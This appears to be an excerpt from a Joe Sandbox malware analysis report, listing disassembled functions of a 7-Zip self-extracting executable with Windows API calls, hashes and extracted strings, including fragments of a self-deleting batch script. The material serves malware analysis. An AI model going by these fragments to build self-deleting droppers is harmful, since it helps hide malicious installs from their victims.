                                                                                                                                                                      • Opcode Fuzzy Hash: fb60bdcc4212d691a135da902df9e72a618cfc71d996d7414fa3402ee0628db0
                                                                                                                                                                      • Instruction Fuzzy Hash: 33A14371A00219AFDB10CFA9CD45AAE7BB9EF88710F154169ED04FB2C5D778ED018BA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00405AC1
                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00405AF4
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405BA6
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405BB8
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405BCE
                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00405BE0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                                                                                                                      • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                                                                                                                      • API String ID: 3376544914-3467708659
                                                                                                                                                                      • Opcode ID: ca22a9b8af0fce94c390dcb497213df53faa148e993931175b6c614e6569d368
                                                                                                                                                                      • Instruction ID: 8e6db173aa86231559a50c62525afe751c9b40574cf7312193450af1fc973e56
                                                                                                                                                                      • Opcode Fuzzy Hash: ca22a9b8af0fce94c390dcb497213df53faa148e993931175b6c614e6569d368
                                                                                                                                                                      • Instruction Fuzzy Hash: 01417332900108AEDB14FBA1EC96DFF7B79EF14304F50406AF601B61A1DB396E85DB58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 004207E9
                                                                                                                                                                        • Part of subcall function 00420381: _free.LIBCMT ref: 0042039E
                                                                                                                                                                        • Part of subcall function 00420381: _free.LIBCMT ref: 004203B0
                                                                                                                                                                        • Part of subcall function 00420381: _free.LIBCMT ref: 004203C2
                                                                                                                                                                        • Part of subcall function 00420381: _free.LIBCMT ref: 004203D4
                                                                                                                                                                        • Part of subcall function 00420381: _free.LIBCMT ref: 004203E6
                                                                                                                                                                        • Part of subcall function 00420381: _free.LIBCMT ref: 004203F8
                                                                                                                                                                        • Part of subcall function 00420381: _free.LIBCMT ref: 0042040A
                                                                                                                                                                        • Part of subcall function 00420381: _free.LIBCMT ref: 0042041C
                                                                                                                                                                        • Part of subcall function 00420381: _free.LIBCMT ref: 0042042E
                                                                                                                                                                        • Part of subcall function 00420381: _free.LIBCMT ref: 00420440
                                                                                                                                                                        • Part of subcall function 00420381: _free.LIBCMT ref: 00420452
                                                                                                                                                                        • Part of subcall function 00420381: _free.LIBCMT ref: 00420464
                                                                                                                                                                        • Part of subcall function 00420381: _free.LIBCMT ref: 00420476
                                                                                                                                                                      • _free.LIBCMT ref: 004207DE
                                                                                                                                                                        • Part of subcall function 0041D99A: HeapFree.KERNEL32(00000000,00000000,?,00420512,?,00000000,?,00000000,?,00420539,?,00000007,?,?,0042093D,?), ref: 0041D9B0
                                                                                                                                                                        • Part of subcall function 0041D99A: GetLastError.KERNEL32(?,?,00420512,?,00000000,?,00000000,?,00420539,?,00000007,?,?,0042093D,?,?), ref: 0041D9C2
                                                                                                                                                                      • _free.LIBCMT ref: 00420800
                                                                                                                                                                      • _free.LIBCMT ref: 00420815
                                                                                                                                                                      • _free.LIBCMT ref: 00420820
                                                                                                                                                                      • _free.LIBCMT ref: 00420842
                                                                                                                                                                      • _free.LIBCMT ref: 00420855
                                                                                                                                                                      • _free.LIBCMT ref: 00420863
                                                                                                                                                                      • _free.LIBCMT ref: 0042086E
                                                                                                                                                                      • _free.LIBCMT ref: 004208A6
                                                                                                                                                                      • _free.LIBCMT ref: 004208AD
                                                                                                                                                                      • _free.LIBCMT ref: 004208CA
                                                                                                                                                                      • _free.LIBCMT ref: 004208E2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                      • Opcode ID: 1e5723d25d53dd34ca643d94fd98a225f049ee2017e098510fc2e6e4f07d8627
                                                                                                                                                                      • Instruction ID: 3beaf2501bb67d53f536dcae1dbbca7b78e80550eb0cec05a9f5e30afea3ddb2
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e5723d25d53dd34ca643d94fd98a225f049ee2017e098510fc2e6e4f07d8627
                                                                                                                                                                      • Instruction Fuzzy Hash: 55313CB1A003159FEB24AB3AE845B9773E8EF10314F50952BE449D7256DF7CAC908B98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetParent.USER32(?), ref: 00407E91
                                                                                                                                                                      • GetWindowLongW.USER32(00000000), ref: 00407E98
                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00407EAF
                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 00407ED4
                                                                                                                                                                      • GetSystemMetrics.USER32(00000031), ref: 00407EE5
                                                                                                                                                                      • GetSystemMetrics.USER32(00000032), ref: 00407EEC
                                                                                                                                                                      • GetWindowDC.USER32(?), ref: 00407EFD
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00407F0A
                                                                                                                                                                      • DrawIconEx.USER32(00000000,?,?,?,?,?,?,?,00000003), ref: 00407F3F
                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00407F47
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2586545124-0
                                                                                                                                                                      • Opcode ID: f2d11296b786a4fd377f23624db1827a53bb40230613b5de07b7b6b3115172f0
                                                                                                                                                                      • Instruction ID: feabce49022254585574a92756a03cb3bcd8ae95f58c29a69c9a5c54e0b4d0b5
                                                                                                                                                                      • Opcode Fuzzy Hash: f2d11296b786a4fd377f23624db1827a53bb40230613b5de07b7b6b3115172f0
                                                                                                                                                                      • Instruction Fuzzy Hash: 91313A76A00209AFCB11DFA8DD88DAF7B79FB49310F414165F905A62A0C734EA019B65
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00408DCC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408E2F
                                                                                                                                                                        • Part of subcall function 00408DCC: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408E4B
                                                                                                                                                                        • Part of subcall function 00408DCC: GetDlgItem.USER32(?,000004B7), ref: 00408E5E
                                                                                                                                                                        • Part of subcall function 00408DCC: SetWindowLongW.USER32(00000000,000000FC,Function_00007E84), ref: 00408E6C
                                                                                                                                                                        • Part of subcall function 00409DFA: GetDlgItem.USER32(?,?), ref: 00409E09
                                                                                                                                                                        • Part of subcall function 00409DFA: ShowWindow.USER32(00000000,?,?,00408B2D,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00409E21
                                                                                                                                                                        • Part of subcall function 00408528: GetDlgItem.USER32(?,?), ref: 00408534
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B6), ref: 00408EF9
                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 00408EFC
                                                                                                                                                                      • CreateWindowExA.USER32(00000200,Edit,0042790E,500100A0,?,?,?,?,?,000004B6,00000000,00000000), ref: 00408F36
                                                                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00408F49
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B6), ref: 00408F58
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00408F60
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B6), ref: 00408F6D
                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 00408F70
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Item$Window$MessageSend$CreateDestroyDirectoryFileFocusInfoLongShowSystem
                                                                                                                                                                      • String ID: Edit
                                                                                                                                                                      • API String ID: 2563414232-554135844
                                                                                                                                                                      • Opcode ID: 5b40b86b37f9b2fb6386d7f969e5f69cfd36e4eedd2983cdb07ff79b2ebd9da0
                                                                                                                                                                      • Instruction ID: 3db7f20ddd23434ef342f299713646c2b699985a6e1e88cb60e1e6d373dd7d0a
                                                                                                                                                                      • Opcode Fuzzy Hash: 5b40b86b37f9b2fb6386d7f969e5f69cfd36e4eedd2983cdb07ff79b2ebd9da0
                                                                                                                                                                      • Instruction Fuzzy Hash: 54218471600208BFDB21EBA5CD85EAFBBBDEF88B54F010029F605A3191CB749D018B64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNEL32(00000064,00000000,SetEnvironment,h1^), ref: 0040A2BF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                      • String ID: 8~B$BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle$h1^$x}B
                                                                                                                                                                      • API String ID: 3472027048-2373866184
                                                                                                                                                                      • Opcode ID: a30e1406589e3724aea250080292677538d657fc8b790d19575dd4150e20d04f
                                                                                                                                                                      • Instruction ID: 0d0e0a01c48454efa818391044959649a7a251a0b1d046cde7e536b1db1cf7b0
                                                                                                                                                                      • Opcode Fuzzy Hash: a30e1406589e3724aea250080292677538d657fc8b790d19575dd4150e20d04f
                                                                                                                                                                      • Instruction Fuzzy Hash: AC511C3174431296EB2477A5AC53B6A37A0AF60714F60403FF601BA2D1EBFC5865864F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040885E: GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00408881
                                                                                                                                                                        • Part of subcall function 0040885E: LoadIconW.USER32(00000000), ref: 00408888
                                                                                                                                                                        • Part of subcall function 0040885E: GetSystemMetrics.USER32(00000032), ref: 0040889A
                                                                                                                                                                        • Part of subcall function 0040885E: GetSystemMetrics.USER32(00000031), ref: 0040889F
                                                                                                                                                                        • Part of subcall function 0040885E: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 004088A8
                                                                                                                                                                        • Part of subcall function 0040885E: LoadImageW.USER32(00000000), ref: 004088AF
                                                                                                                                                                        • Part of subcall function 0040885E: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 004088CD
                                                                                                                                                                        • Part of subcall function 0040885E: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004088DA
                                                                                                                                                                        • Part of subcall function 0040885E: GetDlgItem.USER32(?,000004B2), ref: 004088F6
                                                                                                                                                                        • Part of subcall function 0040885E: GetDlgItem.USER32(?,000004B2), ref: 00408902
                                                                                                                                                                        • Part of subcall function 0040885E: GetWindowLongW.USER32(00000000,000000F0), ref: 00408909
                                                                                                                                                                        • Part of subcall function 0040885E: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0040891E
                                                                                                                                                                        • Part of subcall function 0040885E: GetDlgItem.USER32(?,000004B5), ref: 0040892B
                                                                                                                                                                        • Part of subcall function 0040885E: GetDlgItem.USER32(?,000004B5), ref: 0040893B
                                                                                                                                                                        • Part of subcall function 0040885E: GetWindowLongW.USER32(00000000,000000F0), ref: 00408946
                                                                                                                                                                        • Part of subcall function 0040885E: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00408955
                                                                                                                                                                        • Part of subcall function 0040885E: GetDlgItem.USER32(?,000004B2), ref: 0040896B
                                                                                                                                                                        • Part of subcall function 00409DFA: GetDlgItem.USER32(?,?), ref: 00409E09
                                                                                                                                                                        • Part of subcall function 00409DFA: ShowWindow.USER32(00000000,?,?,00408B2D,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00409E21
                                                                                                                                                                        • Part of subcall function 00408528: GetDlgItem.USER32(?,?), ref: 00408534
                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 00408FCF
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00408FE2
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 00408FFA
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00800000), ref: 00409010
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,00000008), ref: 00409019
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00409022
                                                                                                                                                                        • Part of subcall function 004098A5: GetDlgItem.USER32(?,00000020), ref: 004098C3
                                                                                                                                                                        • Part of subcall function 004098A5: SetWindowPos.USER32(00000000,?,004095FA,?,?,?,?,?,00000000,?,?,75C08FB0,?,?,?,00000020), ref: 004098CA
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B2), ref: 0040904F
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B2), ref: 0040905E
                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00409065
                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00409074
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Item$Long$HandleLoadMessageMetricsModuleRectSendSystem$ClientIconImageScreenShow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1121484998-0
                                                                                                                                                                      • Opcode ID: 8607c753e92394c66e636e55602cd2c73073be55cbc6d2555e96377a0dc2ed7e
                                                                                                                                                                      • Instruction ID: 0966584027bd9f1ce03a75c5dd1f1805fd1e8a040acfc7678cc80ea3a6fb31b6
                                                                                                                                                                      • Opcode Fuzzy Hash: 8607c753e92394c66e636e55602cd2c73073be55cbc6d2555e96377a0dc2ed7e
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F310DB1A00119BFDB10DBA9CD85EAEBBB9FF48310F104125F514B3291CB74AD118BA8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 0041D42F
                                                                                                                                                                        • Part of subcall function 0041D99A: HeapFree.KERNEL32(00000000,00000000,?,00420512,?,00000000,?,00000000,?,00420539,?,00000007,?,?,0042093D,?), ref: 0041D9B0
                                                                                                                                                                        • Part of subcall function 0041D99A: GetLastError.KERNEL32(?,?,00420512,?,00000000,?,00000000,?,00420539,?,00000007,?,?,0042093D,?,?), ref: 0041D9C2
                                                                                                                                                                      • _free.LIBCMT ref: 0041D43B
                                                                                                                                                                      • _free.LIBCMT ref: 0041D446
                                                                                                                                                                      • _free.LIBCMT ref: 0041D451
                                                                                                                                                                      • _free.LIBCMT ref: 0041D45C
                                                                                                                                                                      • _free.LIBCMT ref: 0041D467
                                                                                                                                                                      • _free.LIBCMT ref: 0041D472
                                                                                                                                                                      • _free.LIBCMT ref: 0041D47D
                                                                                                                                                                      • _free.LIBCMT ref: 0041D488
                                                                                                                                                                      • _free.LIBCMT ref: 0041D496
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: ddc0f00c6005bea04ae8add10d77f24990280fa6bfaffc92491d0b1b3d99abe5
                                                                                                                                                                      • Instruction ID: 4d08888591343133376294af4e900ad8f560b8a1682f791f25b5534d159f5171
                                                                                                                                                                      • Opcode Fuzzy Hash: ddc0f00c6005bea04ae8add10d77f24990280fa6bfaffc92491d0b1b3d99abe5
                                                                                                                                                                      • Instruction Fuzzy Hash: 6821EEB6910108AFCF05EF95C851DDE7BB5FF08300F0095AAF5199B129DB39DA85CB84
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenW.KERNEL32(006013F8), ref: 0040199A
                                                                                                                                                                        • Part of subcall function 00404995: lstrlenW.KERNEL32(?,006013FA,00000000,?,00401A2E,006013FA,004269B0), ref: 0040499D
                                                                                                                                                                        • Part of subcall function 00404995: lstrlenW.KERNEL32(?,?,00401A2E,006013FA,004269B0), ref: 004049A9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                                      • String ID: BeginPromptTimeout$GUIFlags$GUIMode$MiscFlags$OverwriteMode$SelfDelete$SfxVarCmdLine1$bpt
                                                                                                                                                                      • API String ID: 1659193697-507222989
                                                                                                                                                                      • Opcode ID: 6d382d4057a2ca73c789a802943481e03c913096d7f7b739b69016f98dd0fcb7
                                                                                                                                                                      • Instruction ID: 96e2bade98d492ccbae3f476de90c7a62236cc71d5e9d7acc624c97e8de4ac41
                                                                                                                                                                      • Opcode Fuzzy Hash: 6d382d4057a2ca73c789a802943481e03c913096d7f7b739b69016f98dd0fcb7
                                                                                                                                                                      • Instruction Fuzzy Hash: E4A15772604215AADB24E7A5E852AFF73B8AF51714FA0403FF041B61F0EB7D9986C21D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$___from_strstr_to_strchr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3409252457-0
                                                                                                                                                                      • Opcode ID: 1eac69c6a15afa916ffa849fd4b15098bfa07d8718329737ccf9796465f6274b
                                                                                                                                                                      • Instruction ID: c5402425f9bfb495e2fe2784cc57e6e9df06e5171d477117bf45f2f4ad90e6e5
                                                                                                                                                                      • Opcode Fuzzy Hash: 1eac69c6a15afa916ffa849fd4b15098bfa07d8718329737ccf9796465f6274b
                                                                                                                                                                      • Instruction Fuzzy Hash: DB51F6F0E08205AFDB10AF75C861AEE7BA4EF05354F00417FE41897281EB3DA9C68759
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B3), ref: 004097E3
                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004097F5
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B4), ref: 004097FF
                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040980B
                                                                                                                                                                      • SendMessageW.USER32(?,00000401,?,00000000), ref: 0040981A
                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00409822
                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 0040982E
                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00409836
                                                                                                                                                                      • SetFocus.USER32(00000000,?,?,004089E2,000004B4,000004B3,00000000,000004B4,00000000,?,00000000), ref: 00409839
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ItemMessageSend$Focus
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3946207451-0
                                                                                                                                                                      • Opcode ID: 48a766f62b29c038107595728edb1150328c1587db245420b6057b3475fdfb11
                                                                                                                                                                      • Instruction ID: a45feeef0dd245b92b4e83e4c90590e06151a5e321d98c8b48c1f57cdd1faa73
                                                                                                                                                                      • Opcode Fuzzy Hash: 48a766f62b29c038107595728edb1150328c1587db245420b6057b3475fdfb11
                                                                                                                                                                      • Instruction Fuzzy Hash: B1F0E171780318BAEF312B62DC4AF96BE1ADB44B60F058021FB086D0E5CAF2D8509A64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 0041957B
                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00419583
                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00419611
                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0041963C
                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00419691
                                                                                                                                                                      • RtlUnwind.KERNEL32(?,004196C9,00000000,00000000,?,00000001,?,?), ref: 004196C3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
